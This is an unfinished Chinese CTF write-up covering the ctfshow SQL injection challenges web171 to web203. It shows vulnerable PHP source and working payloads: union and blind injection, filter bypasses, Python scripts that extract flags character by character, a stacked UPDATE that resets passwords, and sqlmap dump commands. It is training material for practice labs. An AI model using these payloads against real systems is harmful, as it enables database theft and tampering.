ctfshow web入门 sql注入wp(未完)

目录

部分参考:
https://blog.csdn.net/solitudi/article/details/110144623
https://www.wlhhlc.top/posts/14827/
群内pdf

web171

题目源码

//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

解题思路

最基础的无过滤字符型注入,先order判断表长,然后union select进行联合查询

Payload

1'order by 3--+
-1'union select 1,2,3
-1'union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()--+
-1'union select group_concat(column_name),2,3 from information_schema.columns where table_name='ctfshow_user'--+
-1'union select password,2,3 from ctfshow_user--+

web172

题目源码

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if($row->username!=='flag'){
      $ret['msg']='查询成功';
    }

解题思路

和上题一样,只不过这次回显只有两条,而且返回结果里如果有‘flag’就不返回结果,但是ctfshow的flag格式为ctfshow{},并没有‘flag’,迷惑行为,所以直接把上题的payload去掉一条直接打就行

Payload

1'order by 2--+
-1'union select 1,2
-1'union select group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
-1'union select group_concat(column_name),3 from information_schema.columns where table_name='ctfshow_user2'--+
-1'union select password,2,3 from ctfshow_user2--+

web173

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

解题思路

和前两题一样,payload直接打

Payload

1'order by 3--+
-1'union select password,3 from ctfshow_user3--+

web174

题目源码

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

解题思路

这题依旧是无过滤的注入,但是要求返回结果不能有数字,但可以把数字用replace()来把数字改成其他的东西,或者直接把返回结果打印到一个文件中,这次采用了替换的方法

Payload

-1' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(password),'1','numa'),'2','numb'),'3','numc'),'4','numd'),'5','nume'),'6','numf'),'7','numg'),'8','numh'),'9','numi'),'0','numj'),'a' from ctfshow_user4 where username='flag'--+

EXP

a='ctfshow{bnumanumbnumbnumbdac-anumacc-numdnumdnumdnumf-bbnumdnumb-numgbanumdnumgnumgnumaefcnumfc}'
a=a.replace('numa','1')
a=a.replace('numb','2')
a=a.replace('numc','3')
a=a.replace('numd','4')
a=a.replace('nume','5')
a=a.replace('numf','6')
a=a.replace('numg','7')
a=a.replace('numh','8')
a=a.replace('numi','9')
a=a.replace('numj','0')
print(a)

web175

题目源码

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
//检查结果是否有flag
    if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

解题思路

网页的返回结果不能有任何字符,可以通过上题的另一种方法,把数据写入到一个文件中

内容 into outfile ‘文件名’

Payload

-1' union select username,password from ctfshow_user5 where username ='flag' into outfile '/var/www/html/1.txt'--+

web176

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

开始过滤了,union select 大小写绕过即可

Payload

-1'uniOn seLect password,2,3 from ctfshow_user where username='flag'--+

web177

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

这把过滤了空格,用/**/注释符替换掉就行

Payload

-1'union/**/select/**/password,2,3/**/from/**/ctfshow_user/**/where/**/username='flag'%23
#井号一定要改成%23

web178

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

过滤了空格,同时/**/也不给用了,先试试%09

Payload

-1'union%09select%09password,2,3%09from%09ctfshow_user%09where%09username='flag'%23

web179

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

依旧过滤了空格,%09也不行了,试试%0c

Payload

-1'union%0cselect%0cpassword,2,3%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'%23

web180

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

%0c还是可以,但井号被过滤了,可以把%23换成–%0c,因为最开始用的注释符–+那个加号就是空格的意思,所以可以代替

Payload

-1'union%0cselect%0cpassword,2,3%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'--%0c

web181

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
  }

解题思路

%0c也不给了,可以换成其他方法,使用username !=‘flag’ and id =1 or username=‘flag’,or两边会分别运算,左边的!=’flag‘不会影响到右边的=‘flag’,如果前面无效的话,就只会执行后面的,但是后面还有个单引号要闭合,但已经无法使用注释符了,只能使用单引号来闭合它,所以

Payload

-1'or(username='flag')and'a'='a

web182

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select|flag/i', $str);
  }

解题思路

和上题一样,但过滤了’flag’,所以无法使用username=‘flag’,但经过了这么多题,我们已经知道了flag的id为26,所以

Payload

-1'or(id=26)and'a'='a

web183

题目源码

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }

解题思路

不一样起来了,已经不回显查询到的数据了,但是会返回查询到的个数,所以可以利用脚本爆破出最终flag

EXP

import requests
url='http://56b6b2c0-66ee-458a-9693-bf7fe2a97be2.challenge.ctf.show/select-waf.php'
flagstr="}{-1234567890zxcasdqwertyfghvbnuiojklmZXCVBNMASDFGHJKLQWERTYUIOP"
flag='ctfshow'
while 1:
    for i in flagstr:
        payload={"tableName":"(ctfshow_user)where(pass)regexp('"+flag+i+"')"}
        r=requests.post(url,payload)
        if "$user_count = 1;" in r.text:
            flag=flag+i
            print(flag)
            break
    if '}'in flag:
        break

web184

题目源码

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }


解题思路

还是盲注,where没了,没法where like了,但是没有过滤空格,可以换成连接查询

EXP

import requests
url='http://56b6b2c0-66ee-458a-9693-bf7fe2a97be2.challenge.ctf.show/select-waf.php'
flagstr="}{-1234567890zxcasdqwertyfghvbnuiojklmZXCVBNMASDFGHJKLQWERTYUIOP"
flag='ctfshow'
for i in range(9,200):
    for j in flag_str:
        str_16=hex(ord(j))
        payload={"tableName":f"ctfshow_user as a right join ctfshow_user as b on substr(b.pass,{i},100) like {str_16}25"}
        r=requests.post(url,payload)
        if "$user_count = 43;" in r.text:
            flag=flag+j
            print(flag)
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select * from text as a left join text as b on substr(b.flag,5,100) like(0x7b25);
+------+---------------------+------+---------------------+
| id   | flag                | id   | flag                |
+------+---------------------+------+---------------------+
|    1 | flag{this_is_mysql} |    1 | flag{this_is_mysql} |
+------+---------------------+------+---------------------+
1 row in set (0.000 sec)

web185

题目源码

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }


解题思路

不给数字了,但是在sql中,ture=1,ture+ture=2,所以可以用ture代替数字

EXP

import requests
import time
url='http://6010100f-7d0f-45a2-84dd-4c356e0551cd.challenge.ctf.show/select-waf.php'
flag='ctfshow{'
flag_str='-1234567890}{zxcvbnmasdfghjklqwertyuiopZXCVBNMASDFGHJKLQWERTYUIOP'
for i in range(9,200):
    for j in flag_str:
        str_10=ord(j)
        payload={"tableName":f"ctfshow_user as a right join ctfshow_user as b on substr(b.pass,true"+"+true"*(i-1)+","+"true) like char(true"+"+true"*(str_10-1)+")"}
        r=requests.post(url,payload)
        if "$user_count = 43;" in r.text:
            flag=flag+j
            print(flag)
            break
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select * from text as a left join text as b on substr(b.flag,1,1) like(char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true));
+------+---------------------+------+---------------------+
| id   | flag                | id   | flag                |
+------+---------------------+------+---------------------+
|    1 | flag{this_is_mysql} |    1 | flag{this_is_mysql} |
+------+---------------------+------+---------------------+
1 row in set (0.000 sec)

web186

题目源码

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ".$_POST['tableName'].";";
//对传入的参数进行了过滤
  function waf($str){
    return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\%|\<|\>|\^|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
  }


解题思路

和上题一样

EXP

import requests
import time
url='http://6010100f-7d0f-45a2-84dd-4c356e0551cd.challenge.ctf.show/select-waf.php'
flag='ctfshow{'
flag_str='-1234567890}{zxcvbnmasdfghjklqwertyuiopZXCVBNMASDFGHJKLQWERTYUIOP'
for i in range(9,200):
    for j in flag_str:
        str_10=ord(j)
        payload={"tableName":f"ctfshow_user as a right join ctfshow_user as b on substr(b.pass,true"+"+true"*(i-1)+","+"true) like char(true"+"+true"*(str_10-1)+")"}
        r=requests.post(url,payload)
        if "$user_count = 43;" in r.text:
            flag=flag+j
            print(flag)
            break
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select * from text as a left join text as b on substr(b.flag,1,1) like(char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true));
+------+---------------------+------+---------------------+
| id   | flag                | id   | flag                |
+------+---------------------+------+---------------------+
|    1 | flag{this_is_mysql} |    1 | flag{this_is_mysql} |
+------+---------------------+------+---------------------+
1 row in set (0.000 sec)

web187

题目源码

//拼接sql语句查找指定ID用户
  $sql = "select count(*) from ctfshow_user where username = '$username' and password= '$password'";
    $username = $_POST['username'];
    $password = md5($_POST['password'],true);

    //只有admin可以获得flag
    if($username!='admin'){
        $ret['msg']='用户名不存在';
        die(json_encode($ret));
    }

解题思路

开始登录了,用户名如果不是admin的话就无法获得flag,而且密码在传输过去后会被md5加密一次,所以无法直接or 1=1,但是有一个特殊的字符串ffifdyop,这个字符串在md5加密后会变成’or’6和一些不可打印字符,在sql中,字符型的比较数字开头会变成true,也就会变成’'or ture

Payload

用户名:admin
密码:ffifdyop

web188

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username}";
  //用户名检测
  if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }

  //密码判断
  if($row['pass']==intval($password)){
      $ret['msg']='登陆成功';
      array_push($ret['data'], array('flag'=>$flag));
    }

解题思路

继续登录,但是密码不让用字母了,所以没法用上一个方法了,在sql中,字符=0成立,这是sql的弱比较,所以user=(1=0)or pass=0 成立,但过滤了or,可以换成||,或者直接用user=0 pass=0

Payload

用户名:1||1
密码:0

SQL示例

MariaDB [study]> select * from text where id=0||flag=0;
+------+---------------------+
| id   | flag                |
+------+---------------------+
|    1 | flag{this_is_mysql} |
+------+---------------------+
1 row in set, 1 warning (0.000 sec)

web189

不知为何无法成功,下一位

web190

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪

解题思路

没有任何过滤的布尔盲注,发现用户名错误和正确的回显不同,但脚本好像看不到这些字,看一眼答案,是api目录下的返回不同,也可以在源码里看到,数据是传到api里的,答案用的二分法,我懒得写就用普通的了

EXP

import requests
url='http://be5a60a3-e0fc-4f65-b510-8c2fe052028d.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(0,128):
        #payload=f"-1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j}#"
        #payload=f"-1' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))={j}#"
        payload=f"-1' or ascii(substr((select f1ag from ctfshow_fl0g),{i},1))={j}#"
        data={"username":payload,
        "password":'1'}
        r=requests.post(url,data)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=1;
+--------------------------------------------------------------------------------------------------------------+
| ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=1 |
+--------------------------------------------------------------------------------------------------------------+
|                                                                                                            0 |
+--------------------------------------------------------------------------------------------------------------+
1 row in set (0.038 sec)

MariaDB [study]> select ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=116;
+----------------------------------------------------------------------------------------------------------------+
| ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=116 |
+----------------------------------------------------------------------------------------------------------------+
|                                                                                                              1 |
+----------------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)

web191

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪
    if(preg_match('/file|into|ascii/i', $username)){
        $ret['msg']='用户名非法';
        die(json_encode($ret));
    }

解题思路

过滤了ascii可以用ord,一个意思

EXP

import requests
url='http://423be6bc-dbc4-4b51-805e-25b8a7e24d04.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(0,128):
        #payload=f"-1' or ord(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j}#"
        #payload=f"-1' or ord(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))={j}#"
        payload=f"-1' or ord(substr((select f1ag from ctfshow_fl0g),{i},1))={j}#"
        data={"username":payload,
        "password":'1'}
        r=requests.post(url,data)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

SQL示例

MariaDB [(none)]> select ord('a');
+----------+
| ord('a') |
+----------+
|       97 |
+----------+
1 row in set (0.000 sec)

MariaDB [(none)]> select ascii('a');
+------------+
| ascii('a') |
+------------+
|         97 |
+------------+
1 row in set (0.000 sec)

web192

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪
    if(preg_match('/file|into|ascii|ord|hex/i', $username)){
        $ret['msg']='用户名非法';
        die(json_encode($ret));
    }

解题思路

又过滤了ord,那就都不用了,直接和字符比较吧,还快一点

EXP

import requests
url='http://43a67595-f009-4c09-bd95-cfc5570b6f6a.challenge.ctf.show/api/'
flag=''
flagstr='qweasdzxcvbnmfghjklrtyuiopQAZWSXEDCRFVBTGNYHMUJKILOP0123456789}{-_'
for i in range(1,66):
    for j in flagstr:
        #payload=f"-1' or substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1)='{j}'#"
        #payload=f"-1' or substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{i},1)='{j}'#"
        payload=f"-1' or substr((select f1ag from ctfshow_fl0g),{i},1)='{j}'#"
        data={"username":payload,
        "password":'1'}
        r=requests.post(url,data)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag=flag+j
            print(flag)
            break
        elif j=='_':
            exit()
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='t';
+------------------------------------------------------------------------------------------------------------+
| substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='t' |
+------------------------------------------------------------------------------------------------------------+
|                                                                                                          1 |
+------------------------------------------------------------------------------------------------------------+
1 row in set (0.001 sec)

web 193

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪
    if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){
        $ret['msg']='用户名非法';
        die(json_encode($ret));
    }

解题思路

如题,换成mid,一个意思

EXP

import requests
url='http://8f100430-7936-4acb-a785-5dc713232fa9.challenge.ctf.show/api/'
flag=''
flagstr='qweasdzxcvbnmfghjklrtyuiopQAZWSXEDCRFVBTGNYHMUJKILOP0123456789},{-_'
for i in range(1,66):
    for j in flagstr:
        #payload=f"-1' or mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1)='{j}'#"
        #payload=f"-1' or mid((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{i},1)='{j}'#"
        payload=f"-1' or mid((select f1ag from ctfshow_flxg),{i},1)='{j}'#"
        data={"username":payload,
        "password":'1'}
        r=requests.post(url,data)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag=flag+j
            print(flag)
            break
        elif j=='_':
            exit()
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='t';
+---------------------------------------------------------------------------------------------------------+
| mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='t' |
+---------------------------------------------------------------------------------------------------------+
|                                                                                                       1 |
+---------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)

web194

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = '{$username}'";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪
   if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i', $username)){
        $ret['msg']='用户名非法';
        die(json_encode($ret));
    }

解题思路

没过滤mid,继续吧

EXP

import requests
url='http://8f100430-7936-4acb-a785-5dc713232fa9.challenge.ctf.show/api/'
flag=''
flagstr='qweasdzxcvbnmfghjklrtyuiopQAZWSXEDCRFVBTGNYHMUJKILOP0123456789},{-_'
for i in range(1,66):
    for j in flagstr:
        #payload=f"-1' or mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1)='{j}'#"
        #payload=f"-1' or mid((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{i},1)='{j}'#"
        payload=f"-1' or mid((select f1ag from ctfshow_flxg),{i},1)='{j}'#"
        data={"username":payload,
        "password":'1'}
        r=requests.post(url,data)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag=flag+j
            print(flag)
            break
        elif j=='_':
            exit()
    if '}'in flag:
        break

SQL示例

MariaDB [study]> select mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='t';
+---------------------------------------------------------------------------------------------------------+
| mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='t' |
+---------------------------------------------------------------------------------------------------------+
|                                                                                                       1 |
+---------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)

web195

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  //密码检测
  if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';
    die(json_encode($ret));
  }
  //密码判断
  if($row['pass']==$password){
      $ret['msg']='登陆成功';
    }
  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if(preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }
  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

解题思路

堆叠注入,可以用update把所有pass改成0

EXP

用户名:0x61646d696e;update`ctfshow_user`set`pass`=0
密码:0

SQL示例

MariaDB [study]> select * from text;
+------+---------------------+
| id   | flag                |
+------+---------------------+
|    1 | flag{this_is_mysql} |
+------+---------------------+
1 row in set (0.000 sec)

MariaDB [study]> update`text`set`flag`=1;
Query OK, 1 row affected (0.019 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MariaDB [study]> select * from text;
+------+------+
| id   | flag |
+------+------+
|    1 | 1    |
+------+------+
1 row in set (0.000 sec)

web196

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if(preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }
  if(strlen($username)>16){
    $ret['msg']='用户名不能超过16个字符';
    die(json_encode($ret));
  }
  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

解题思路

题目说过滤了select,但并没有,为什么可以用select(0)绕过可以看一下sql示例

EXP

用户名:1;select(0);
密码:0

SQL示例

MariaDB [study]> select id,flag from text;
+------+---------------------+
| id   | flag                |
+------+---------------------+
|    1 | flag{this_is_mysql} |
+------+---------------------+
1 row in set (0.000 sec)

MariaDB [study]> select id,(0),flag from text;
+------+---+---------------------+
| id   | 0 | flag                |
+------+---+---------------------+
|    1 | 0 | flag{this_is_mysql} |
+------+---+---------------------+
1 row in set (0.000 sec)

web197

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set//i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

解题思路

过滤了一大堆东西,但是没有过滤show,而且密码没有数字限制,所以可以用show table来绕过,原理和select 0类似

EXP

用户名:0x61646d696e;show tables
密码:ctfshow_user

SQL示例

MariaDB [study]> show tables;
+-----------------+
| Tables_in_study |
+-----------------+
| text            |
+-----------------+
1 row in set (0.000 sec)

web198

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

解题思路

过滤增加了dorp和create,看来上题本来是想我们用drop把表删掉,然后重新创一个表来登录,和上题一样,没过滤show,继续吧

EXP

用户名:0x61646d696e;show tables
密码:ctfshow_user

SQL示例

MariaDB [study]> show tables;
+-----------------+
| Tables_in_study |
+-----------------+
| text            |
+-----------------+
1 row in set (0.000 sec)

web199

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop|\(/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

解题思路

感觉好像没变化…继续吧,题目也说继续

EXP

用户名:0x61646d696e;show tables
密码:ctfshow_user

SQL示例

MariaDB [study]> show tables;
+-----------------+
| Tables_in_study |
+-----------------+
| text            |
+-----------------+
1 row in set (0.000 sec)

web200

题目源码

  //拼接sql语句查找指定ID用户
  $sql = "select pass from ctfshow_user where username = {$username};";
  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop|\(|\,/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }
  if($row[0]==$password){
      $ret['msg']="登陆成功 flag is $flag";
  }

解题思路

肛道理,最后几题堆叠没看出来太大区别

EXP

用户名:0x61646d696e;show tables
密码:ctfshow_user

SQL示例

MariaDB [study]> show tables;
+-----------------+
| Tables_in_study |
+-----------------+
| text            |
+-----------------+
1 row in set (0.000 sec)

web201

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

让你用sqlmap,然后根据要求改掉referer和user-agent

EXP

sqlmap -u http://cb57a502-0560-42a9-8a3a-12f0e210f188.challenge.ctf.show/api/?id=1 --dbs --referer="ctf.show"

sqlmap -u http://cb57a502-0560-42a9-8a3a-12f0e210f188.challenge.ctf.show/api/?id=1 -D ctfshow_web --tables --referer="ctf.show"

sqlmap -u http://cb57a502-0560-42a9-8a3a-12f0e210f188.challenge.ctf.show/api/?id=1 -D ctfshow_web -T ctfshow_user --columns --referer="ctf.show"

sqlmap -u http://cb57a502-0560-42a9-8a3a-12f0e210f188.challenge.ctf.show/api/?id=1 -D ctfshow_web -T ctfshow_user -C pass --dump --referer="ctf.show"

web202

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

让你用sqlmap,要求使用–data 调整sqlmap的请求方式

EXP

sqlmap -u http://f0cf8faf-89ce-4d6d-865d-b29bdaa03511.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" --dbs

sqlmap -u http://f0cf8faf-89ce-4d6d-865d-b29bdaa03511.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" -D ctfshow_web --tables

sqlmap -u http://f0cf8faf-89ce-4d6d-865d-b29bdaa03511.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" -D ctfshow_web -T ctfshow_user --columns

sqlmap -u http://f0cf8faf-89ce-4d6d-865d-b29bdaa03511.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" -D ctfshow_web -T ctfshow_user -C pass --dump

web203

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

使用–method 调整sqlmap的请求方式

EXP

sqlmap -u http://b96c710e-fe78-4aaf-a19c-c45338e228cf.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --dbms=mysql -D ctfshow_web -T ctfshow_user -C pass --dump

web204

